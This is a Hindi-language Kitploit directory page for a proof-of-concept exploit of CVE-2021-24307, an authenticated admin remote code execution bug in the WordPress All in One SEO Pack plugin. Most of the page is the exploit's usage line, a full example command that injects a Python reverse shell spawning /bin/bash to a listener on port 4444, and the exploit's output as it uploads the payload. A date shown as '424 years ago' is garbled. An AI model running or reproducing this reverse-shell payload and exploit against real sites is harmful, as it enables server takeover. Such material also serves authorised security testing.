Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — CVE-2021-24307 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, All in One SEO Pack <= 4.1.0.1 में PHP unserialization के माध्यम से एक प्रमाणित एडमिन RCE, जो मनमाना कमांड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, All in One SEO Pack <= 4.1.0.1 में PHP unserialization के माध्यम से एक प्रमाणित एडमिन RCE, जो मनमाना कमांड निष्पादन सक्षम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
424 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Admin PHP unserialization RCE in All in one SEO pack (CVE-2021-24307)

AISEO <= 4.1.0.1 में प्रमाणित एडमिन RCE का सरल PoC, उदाहरण के रूप में प्रदान किया गया।

पूरा लेख यहाँ पढ़ें: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

उपयोग:

root@kitploit:~
php exploit.php url login password php_command arguments [proxy]

उदाहरण:

root@kitploit:~
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 authenticated admin RCE --
-- Exploit by Vincent MICHEL (@darkpills) --

[+] wordpress http://wordpress/ पर प्रमाणीकरण हो रहा है
[+] WP REST API nonce प्राप्त किया जा रहा है
[+] Nonce मिला: 6aeb9ddf05
[+] कमांड निष्पादित करने के लिए POST payload बनाया जा रहा है: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] सेटिंग्स आयात के साथ ini फ़ाइल अपलोड की जा रही है
[+] हो गया! परिणाम कहीं और जाँचें (ब्लाइंड कमांड निष्पादन)
टूल डाउनलोड करें